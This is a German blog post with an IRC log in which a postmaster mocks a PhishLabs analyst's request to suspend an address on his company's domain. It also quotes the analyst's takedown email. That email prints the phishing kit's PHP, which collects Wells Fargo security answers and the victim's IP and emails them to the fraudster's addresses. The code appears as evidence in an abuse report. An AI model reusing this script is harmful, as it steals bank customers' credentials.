Wer sich immer schon gewundert hat, was Posthamster (egal, wieviele Hüte sie tragen), den ganzen Tag lang so erleben:

19:45 < adaptr> I have a story
19:46 < adaptr> early this morning, I got a corporate email from some guy named “John” at phishlabs.com. yes, srsly.
19:47 < adaptr> in it, he told me he had uncovered a bank phishing site in which the phishing script contained a mail destination on one of our corporate domains. he asked me to disable the email account because, well, it wuz badd
19:48 < adaptr> he included about 25 lines of PHP with one recipient a gmail address, and another the same localpart at our domain
19:49 < adaptr> I mailed him back stating, simply, that A. I had no idea who he was, or where the PHP script came from, since he didn’t bother to tell me. Also, B. how am I supposed to control whatever email address ANYBODY puts ANYWHERE ?
19:50 < adaptr> I further divulged that this is a business domain without user mailboxes, and that address did not exist
19:50 < adaptr> which he could have ascertained himslef within 5 seconds by SENDING A MAIL TO IT
19:50 < adaptr> which he didn’t
19:50 < adaptr> I though: there, chew on that
19:50 < adaptr> a few hours later, HE CALLS ME
19:51 < adaptr> a real, live, direct, human phone call, from Maryland to .NL
19:51 < adaptr> he asked if I could help him by disabling that email address, becuz he wus ph33red of the bad phishermen
19:52 < adaptr> I had to explain to him, again, that A. this is not a mailbox, B. whatever email people send to our domains is none of his business, and C. if he has the PHP code, he can shut down the web site and the problem is over
19:53 < adaptr> he responded that he already had shutdown the web siye, but well, yada yada still ph33r and would I help him ?
19:53 < adaptr> I said if he wanted anything from our domain, he could produce papers, such as warrants or court orders, and we’d be happy to oblige
19:53 < adaptr> otherwise, nothing doing, noob
19:54 < adaptr> then came the kicker: remember that this was a business call, from “John” to me as a representative of the firm I work for
19:55 < adaptr> he had figured out by now that I was not going to indulge his fantasies, so he started off: what would YOUR FAMILY, who are surely also a victim of phishing, yada yada
19:55 < adaptr> I exploded at him
19:55 < adaptr> I said you are bringing personal matters into a business issue ? take your shit up with our legal department, if you have any, and gfy
19:55 < adaptr> he understood my tone and hung up
19:56 < adaptr> unbelievable
19:56 < adaptr> phishlabs.com
19:56 < cite> adaptr: May I blog that little story?
19:56 < adaptr> a one-person “security expert” site
19:56 < adaptr> with about 100 hits a day
19:56 < adaptr> cite: go wild
19:57 < cite> adaptr: Thanks. […]
19:57 < adaptr> cite: don’t forget to mention he claimed to be acting on behalf of Wells Fargo

Und das hier war die erwähnte Mail:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
From: PhishLabs Security Operations [mailto:soc@phishlabs.com]
Sent: do 2010-02-18 04:04
To: support@*****; abuse@*****
CC: casetracker@phishlabs.com
Subject: [PL-****] Please suspend email address for phishing -

Hello,

Our company investigates computer crimes. 

 

We have determined that one of your customers email accounts is being used to receive stolen data from a bank scam. 
A fake bank web page (phishing) is set up and programmed to send victim bank info to housefly23@*******.

We are requesting that you suspend the email account housefly23@*******. 
Also, please send us any details of the user and the messages which may contain bank details.    

We will return this information to our customer, Wells Fargo bank.

 

Thank you,

John

 

Phish Site PHP Code

 

<?php
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
$question1 = $HTTP_POST_VARS["question1"];
$answer1 = $HTTP_POST_VARS["answer1"];
$question2 = $HTTP_POST_VARS["question2"];
$answer2 = $HTTP_POST_VARS["answer2"];
$question3 = $HTTP_POST_VARS["question3"];
$answer3 = $HTTP_POST_VARS["answer3"];
$mesaj = "Wellsfargo Result 3:
question1 : $question1
answer1 : $answer1
question2 : $question2
answer2 : $answer2
question3 : $question3
answer3 : $answer3
---------------Created By CADOTUNJI------------------------------
IP : $ip 
DATE : $datamasii
";

$recipient = "housefly23@gmail.com,housefly23@*******";
$subject = "Wellsfargo Result 3:";

mail($recipient,$subject,$mesaj);
header("Location: verify.php");
?>

Leute, seid dankbar, wenn Eure Mails einfach nur ankommen. Ihr wisst gar nicht zu schätzen, was andere dafür tun müssen!